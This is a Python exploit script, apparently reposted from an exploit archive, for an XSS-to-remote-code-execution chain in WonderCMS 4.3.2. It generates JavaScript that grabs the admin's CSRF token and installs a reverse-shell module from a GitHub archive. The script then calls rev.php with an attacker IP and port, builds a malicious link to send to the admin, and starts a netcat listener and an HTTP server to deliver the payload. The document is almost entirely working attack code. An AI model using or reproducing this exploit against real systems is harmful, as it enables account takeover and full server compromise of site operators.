Share
## https://sploitus.com/exploit?id=PACKETSTORM:177169
# Author: prodigiousMind  
# Exploit: Wondercms 4.3.2 XSS to RCE  
  
  
import sys  
import requests  
import os  
import bs4  
  
if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")  
else:  
data = '''  
var url = "'''+str(sys.argv[1])+'''";  
if (url.endsWith("/")) {  
url = url.slice(0, -1);  
}  
var urlWithoutLog = url.split("/").slice(0, -1).join("/");  
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;   
var token = document.querySelectorAll('[name="token"]')[0].value;  
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;  
var xhr3 = new XMLHttpRequest();  
xhr3.withCredentials = true;  
xhr3.open("GET", urlRev);  
xhr3.send();  
xhr3.onload = function() {  
if (xhr3.status == 200) {  
var xhr4 = new XMLHttpRequest();  
xhr4.withCredentials = true;  
xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");  
xhr4.send();  
xhr4.onload = function() {  
if (xhr4.status == 200) {  
var ip = "'''+str(sys.argv[2])+'''";  
var port = "'''+str(sys.argv[3])+'''";  
var xhr5 = new XMLHttpRequest();  
xhr5.withCredentials = true;  
xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);  
xhr5.send();  
  
}  
};  
}  
};  
'''  
try:  
open("xss.js","w").write(data)  
print("[+] xss.js is created")  
print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))  
print("----------------------------\n")  
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""  
XSSlink = XSSlink.strip(" ")  
print("send the below link to admin:\n\n----------------------------\n"+XSSlink)  
print("----------------------------\n")  
  
print("\nstarting HTTP server to allow the access to xss.js")  
os.system("python3 -m http.server\n")  
except: print(data,"\n","//write this to a file")